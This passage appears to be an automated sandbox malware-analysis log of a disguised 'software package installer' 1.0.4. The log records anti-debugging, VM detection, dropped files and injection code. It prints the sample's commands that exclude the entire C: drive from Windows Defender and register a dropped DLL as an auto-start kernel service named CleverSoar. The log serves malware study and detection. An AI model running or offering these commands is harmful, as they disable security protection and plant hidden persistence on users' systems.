Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.1.dr Static PE information: section name: .00cfg
Source: update.vac.1.dr Static PE information: section name: .voltbl
Source: update.vac.1.dr Static PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: update.vac.6.dr Static PE information: section name: .00cfg
Source: update.vac.6.dr Static PE information: section name: .voltbl
Source: update.vac.6.dr Static PE information: section name: .j)q
Source: is-7F262.tmp.6.dr Static PE information: section name: .xdata
Source: updat4.vac.6.dr Static PE information: section name: .00cfg
Source: updat4.vac.6.dr Static PE information: section name: .voltbl
Source: updat4.vac.6.dr Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6750B push ecx; ret 6_2_6CA6751E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C910F00 push ss; retn 0001h 6_2_6C910F0A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB34F10 push eax; ret 6_2_6CB34F2E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA999F4 push 004AC35Ch; ret 6_2_6CA99A0E
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB35290 push eax; ret 6_2_6CB352BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003845F4 push 0042C35Ch; ret 10_2_0038460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041FB10 push eax; ret 10_2_0041FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041FE90 push eax; ret 10_2_0041FEBE
Source: update.vac.1.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.dr Static PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-7F262.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5147 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4572 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 569 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 536 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Window / User API: threadDelayed 506 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-7F262.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ONGLN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UFV8.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 Thread sleep count: 5147 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696 Thread sleep count: 4572 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA598B0 FindFirstFileA,FindClose, 6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00387496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389C60 GetSystemInfo, 10_2_00389C60
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}c
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1774496538.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\~
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CA6EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_004057D0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA6DF9D mov eax, dword ptr fs:[00000030h] 6_2_6CA6DF9D
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA78B86 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B86
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA78B55 mov eax, dword ptr fs:[00000030h] 6_2_6CA78B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA67ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CA67ADD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB35720 cpuid 6_2_6CB35720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0038AB2A GetSystemTimeAsFileTime, 10_2_0038AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00420090 GetVersion, 10_2_00420090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1920433392.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
No contacted IP infos